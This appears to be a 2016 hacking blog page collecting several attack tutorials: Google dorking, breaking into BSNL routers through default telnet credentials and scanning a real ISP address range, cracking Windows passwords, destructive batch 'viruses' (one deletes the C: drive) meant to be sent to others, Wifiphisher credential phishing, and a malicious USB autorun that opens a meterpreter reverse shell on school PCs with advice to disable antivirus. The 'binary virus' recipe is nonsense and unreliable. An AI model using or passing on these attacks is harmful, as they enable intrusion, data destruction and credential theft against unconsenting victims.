Friday, July 8, 2016

Understanding Google Dorks and How Hackers Use Them

The idea of using Google as a hacking tool or platform certainly isn’t a novel idea, and hackers have been leveraging this incredibly popular search engine for years. In fact, Google Dorks have their roots in 2002 when a man by the name of Johnny Long started using custom queries to search for elements of certain websites that he could leverage in an attack. At its core, that’s exactly what Google Dorks are – a way to use the search engine to pinpoint websites that have certain flaws, vulnerabilities, and sensitive information that can be taken advantage of. As a side note, some people refer to Google Dorks as Google Hacking (they’re more or less synonymous terms).
Believe it or not, Google Dorks can uncover some incredible information such as email addresses and lists, login credentials, sensitive files, website vulnerabilities, and even financial information (e.g. payment card data). In fact, in our WordPress hacking tutorial, we listed a few Google Dorks that could be used to find SQLi (SQL injection) vulnerabilities. And the wonderful thing is that this is an incredibly passive form of attack that doesn’t draw much attention to the hacker. Unfortunately, some people use these techniques for illicit and nefarious activities such as cyberwarfare, digital terrorism, identity theft, and a whole host of other undesirable activities.
If you are reading this to learn how to break into a website and harm others just for kicks, perhaps you should pursue other interests. Let me caution you by stating that breaking into websites is anillegal activity, and it violates not only laws bur moral codes as well. If you get caught, the consequences could be dire. Then why learn this to begin with, you ask? Well, the first place any white hat hacker needs to start is with understanding how hackers operate. Only then can they plug up security holes to prevent future attacks.
Understanding Google Dorks Operators
Just like in simple math equations, programming code, and other types of algorithms, Google Dorks has several operators that aspiring white hat hackers need to understand. There are far too many to include in this guide, but we will go over some of the most common:
  • intitle – this allows a hacker to search for pages with specific text in their HTML title. So intitle: “login page” will help a hacker scour the web for login pages.
  • allintitle – similar to the previous operator, but only returns results for pages that meet all of the keyword criteria.
  • inurl – allows a hacker to search for pages based on the text contained in the URL (i.e. “login.php”).
  • allinurl – similar to the previous operator, but only returns matches for URLs that meet all the matching criteria.
  • filetype – helps a hacker narrow down search results to specific types of files such as PHP, PDF, or TXT file types.
  • ext – very similar to filetype, but this looks for files based on their file extension.
  • intext – this operator searches the entire content of a given page for keywords supplied by the hacker.
  • allintext – similar to the previous operator, but requires a page to match all of the given keywords.
  • site – limits the scope of a query to a single website.
Custom Crafting Google Dork Queries
Now that we have a basic understanding of some of the operators and how Google Dorks can be used to scour the web, it’s time to look at query syntax. The following is the high level structure of Google Dorks that targets a specific domain:
  • inurl: domain/” “additional dorks
A hacker would simply plug in the desired parameters as follows:
  • inurl = the URL of a site you want to query
  • domain = the domain for the site
  • dorks = the sub-fields and parameters that a hacker wants to scan
If a hacker wishes to search by a field other than the URL, the following can be effectively substituted:
  • intitle:
    inurl:
    intext:
    define:
    site:
    phonebook:
    maps:
    book:
    info:
    movie:
    weather:
    related:
    link:
These options will help a hacker uncover a lot of information about a site that isn’t readily apparent without a Google Dork. These options also offer ways to scan the web to located hard to find content. The following is an example of a Google Dork:
Making Effective Use of Operators
It may seem a little cryptic at first, so let me provide a few examples that show how the different operators can be used to locate content and website data. A user can make effective use of theintitle operator to locate anything on a website. Perhaps they are scraping email addresses and want to scan sites for the “@” symbol, or maybe they are looking for an index of other files.
Furthermore, the intext operator can basically be used to scan individual pages for any text you want, such as a target’s email address, name, the name of a web page (like a login screen) or other personal information to collect data about them.
The more you practice, the further you’ll be able to hone your queries to pinpoint different types of websites, pages, and vulnerabilities. Again, I need to caution you not to use these queries to attack another website, because that would be illegal and could get you into a lot of trouble. Still, Google Dorks are a great way to locate hidden information on the web, which is why hackers love to use them to find security flaws in websites.
If you want to dig into some more queries, there are some great Google Dork resources on the web.
Posted by at No comments:
Labels:

Hacking BSNL Broadband Routers Tutorial by Binary Dad

                                                           Hacking BSNL Routers
Note : This hack works on most of newly ADSL, ADSL2+, ADSL2+M routers.
In this article we are going to hack into router to learn more about it. You might not know that this small and innocent looking modem is actually a “Linux CPU”. Lets get into it. First do a nmap scan of this modem. Here is a quick example :
$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
The http port is open and that is why we are able to access the administration page from http://192.168.1.1/
But apart from http the telnet port is also open. So why not try connecting to it.
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>
 
 Wow! we are able to login into the telnet daemon of our router using the default username/password of admin/admin.
What next… type in the help command and hit enter. It will list the supported commands somewhat like this
> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>
 Some of these are the common terminal commands on linux. ps, pwd, ping, cat etc. So lets see the current working directory using pwd.
> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available. So we have to use another trick to list the directories. And the trick is echo *
> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>
 Cool! Now those directories are found on any linux system like Ubuntu, Fedora etc. 

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.
> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>
Thats a linux password file.

Linux version

The uname command is not available so to get the linux kernel version and other details use the following command
> cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>
So that shows the linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command.
> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#
So now we get a BusyBox shell. Once again we can type the help command to see what all is available.
# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#
This time we have a few additional commands available, like cd, mkdir, date, eval, exec etc and even mount.
A list of all possible commands that Busybox can have is available here.

CPU/RAM Information

The details about CPU and architecture can be found out using the following command
# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#
Its an MIPS based 32bit processor. You can compile C programs for this platform using an mips compiler. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.
RAM information
# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

So the device seems to have around 6MB of inbuilt memory.
There are many other files in the /proc directory that can be viewed to gather more information about the system.
# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#
Try viewing other files and see what comes up.

Get Current username

The whoami command is not available to the echo command has to be used to find the current username, home directory etc.
# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The var directory is writable. And files have to be created using the echo command.
# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#
Remote files can be downloaded onto the router as well. The ftpget command is available for this. The exact syntax can be found athttp://www.busybox.net/downloads/BusyBox.html.
May be you would like to write and compile a C program and then upload it to this router.

Hacking remote routers

You can discover remote routers with a simple nmap command like this
$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/
This command just scans all the Bsnl broadband ips to see which are alive and have a port 80 open. If its micro_httpd then its most likely a SemIndia router with BusyBox shell. The “Embedded Allegro RomPager” are Airtel Binatone and Beetel modems being used by Bsnl broadband users.
One way to irritate other users is to restart the remote router by issuing the reboot command in the telnet terminal. But that would not be much fun.

Hack into the LAN

The arp command can be used on the remote router to list its LAN nodes or all the computers in its internal network. Its quite simple
> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>
The HW/mac address has been hidden for privacy purpose. Now the router tells us who is inside the network.
Note that that arp command shall not be available in the sh shell. It will only be available in the telnet session.
Any of the internal nodes can be pinged 
> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>
From here on it might be possible to do some advanced hacking. The insmodcommand is available that can be used to load kernel modules.
Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. The iptables command is available and can be used to do this.

Conclusion

It would be a good idea to protect your own router from such hack attempts from the internet. This can be done by disabling remote logins to telnet, http etc. Login into your configuration page and and find out how to do that.
This hacking technique is not only applicable to just Bsnl routers. Other isps like airtel are also using similar routers. So it might be possible to try the same thing on them as well. Just need to scan the ip range.
Rest is your creativity. Research and find out what else can be done on such routers.
Posted by at No comments:
Labels: ,

Thursday, July 7, 2016

Windows 7 Hack With Ophcrack


In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here.
  2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
  • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
  • Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.
 5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.
 8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
  9. Copy this hash value which is under NT Hash field.
 10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
 11. Type in the hash value you copied down in Step 9, Enter the captche and click onCrack Hashes.


Posted by at No comments:

Binary Virus For Format Hardisk

Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

How To Create Virus To Format Hard Drive ?

 1. Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

Posted by at No comments:
Labels: ,

Amazing Batch File

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


 2. Save this file as  virus.bat
 3. Done you just created your virus
Posted by at 2 comments:
Labels: ,

Learn to make Dangerous Virus in couple of Minute


What will this virus do ?  

 1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Read Below Tutorials On Making Other Viruses


Posted by at No comments:
Labels: ,

Wednesday, July 6, 2016

A new Attack for Wi-Fi has been released called Wifiphisher.
This attack is a play on old tricks using a Man-in-the-Middle and phishing attack.

It works by selecting a target router then kicking their connection which forces them to connect to you instead of their router.

When they do they are asked for their Wi-Fi username and password to upgrade the firmware of the router.
After they enter their password it is displayed to your screen. Once you have the password, they are allowed to automatically reconnect to their router and move on.
They have the attack listed as the following steps.

 From the victim’s perspective, the attack makes use in three phases:
1…..Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.

2…..Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.

3…..Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks WPA password confirmation due to a router firmware upgrade.

 It runs from Kali Linux and needs two wireless cards one that the victim can connect to and another to kick their connection with the Deauth command which requires a Kali Linux compatible adapter to do. I chooseTP_link wireless USB adapter which is available on Flipkart

This is a tool that I am going to play with on my test routers and see how well it works.

To install wifiphisher, open a terminal window and enter the following command.
git clone https://github.com/kalimkhan/Wifi-Phisher

Download Wifi Phisher : https://www.facebook.com/groups/maskmaster.pk/10153243260163123/
To run it type:
cd wifiphisher
sudo python ./wifiphisher.py
Here is the Github home page for wifiphisher. https://github.com/kalimkhan/Wifi-Phisher
click here to download wifiphisher
Posted by at No comments:
Labels:

How to Take Data From PC Using A USB

How to Take Data From PC Using A USB

Security Test [ PC by Using A USB ]

Today we are going to do a remote hacking using a malicious file created in Backtrack,All then you will have to do is Plug in the USB,wait for 5 seconds,and plug it out,Then you will have control over the victim PC.
Don't Abuse this Trick.You are responsible for your actions.

What Do We Need ?

#Backtrack 5
#Vulnerable Software On Victim PC,(read below)
#Physical Access For 10 Seconds.
#Patience and Brains.


Creating The Malicious Batch File :

#Step 1 -

Open Backtrack,Go to The Social Engineering Toolkit by entering the below commands in Konsole :
cd /pentest/exploits/set
./set

#Step 2 -

Select the Social-Engineering Attacks by entering 1.

#Step 3 -

Select Infectious Media Generator by selecting inserting 3,This option will help you create an autorun.nf file that will hack the vulnerable software.

#Step 4 -

Select 1st option,This will help you to select a specific software to exploit

#Step 5 -

Now a list comes up with name of software's to exploit,this is the real deal.Now select the software you know is running on Victim Machine/'s,Adobe Reader and Microsoft Word is the most common software's used in school,so i will select option 11.

#Step 6 -

Now you have two options,Get a pc-generated blank pdf file or create your own,We'll select to create our own file,Now enter the path to pdf file  as /home/exam-sheet.pdf .The file name as exam-sheet.pdf 
(EVIL LAUGH,Cause i'm going to attack school) you can set another file name

#Step 7 -

Now select option 2 for windows/meterpreter/reverse_tcp.

#Step 8 -

Now you need to insert the IP Address for listener,Listener is another term for attacker,Insert your Public IP address (or internal IP address if you are hacking a PC on your LAN),and port as 80,then Press enter.

#Step 9 -

Here we need to edit the autorun.inf  file. Go to the directory of autorun where our both files : payload file & autorun file are located.
follow the following steps to edit & rename our files :
#open new terminal and type :
            ls -al /pentest/exploits/set/autorun/ 
we can see two files here one is autorun file and other is template.
#Now go to the directory:
         cd /pentest/exploits/set/autorun
.#Type "nano autorun.inf" (it will open a nano editor for editing autorun.inf file.Here give the name of your file which you want to open by plugin the USB here.For me,i Insert the name exam-sheet.pdf)
#Copy these both files on the USB drive.

#Step 10 -

Keep the attacker computer running,and when you will plug-in the USB drive in your victim PC,you will have a meterpereter season opened on your (attacker) Computer.Now you can steal files,commence a remote shutdown and much more.
You done .... 


Side Tip : Disable the antivirus on the victim pc if you get the chance,that will ease things up a little bit.

Posted by at No comments:
Labels:
Subscribe to: Comments (Atom)

Comments System

Disqus Shortname